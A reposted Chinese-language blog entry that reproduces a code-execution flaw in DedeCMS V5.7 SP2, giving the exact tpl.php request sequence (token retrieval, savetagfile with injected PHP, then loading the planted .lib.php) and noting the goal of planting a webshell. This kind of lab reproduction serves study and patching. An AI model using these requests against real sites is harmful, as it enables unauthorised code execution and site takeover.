碼上歡樂
相關內容    簡體    繁體

20200904-DedeCMSv5.7SP2代碼執行漏洞

本文轉載自   查看原文   2020-09-04 10:22   990    CMS實驗

織夢內容管理系統(DedeCms)是一款PHP開源網站管理系統。 
DedeCMS V5.7 SP2版本中tpl.php存在代碼執行漏洞,攻擊者可利用該漏洞在增加新的標簽中上傳木馬,獲取webshell

安裝織夢CMS環境

后台界面

訪問   域名+/dede/tpl.php?action=upload    獲取token,右鍵查看源代碼

訪問   域名 + /dede/tpl.php?filename=hahaha.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=token值

文件名可自定義,必須以.lib.php結尾

 

訪問    域名+/include/taglib/hahaha.lib.php

漏洞詳情

###############################################

參考鏈接:

https://github.com/SecWiki/CMS-Hunter/tree/master/DedeCMS

https://www.freebuf.com/vuls/164035.html

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 20200904-DedeCMSv5.7SP2代碼執行漏洞 dedecmsv5.7sp1遠程文件包含漏洞審計 struts2代碼執行漏洞 Ecshop V2.7代碼執行漏洞分析 Kibana<6.6.0代碼執行漏洞復現 DedeCMS V5.7 SP2后台存在代碼執行漏洞 DedeCMS V5.7 SP2后台代碼執行漏洞復現(CNVD-2018-01221) Exchange CVE-2020-0688代碼執行漏洞分析 dedecmsV5.7 任意文件上傳漏洞修復 2020/2/13 bluecmsv1.6sp1代碼審計
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM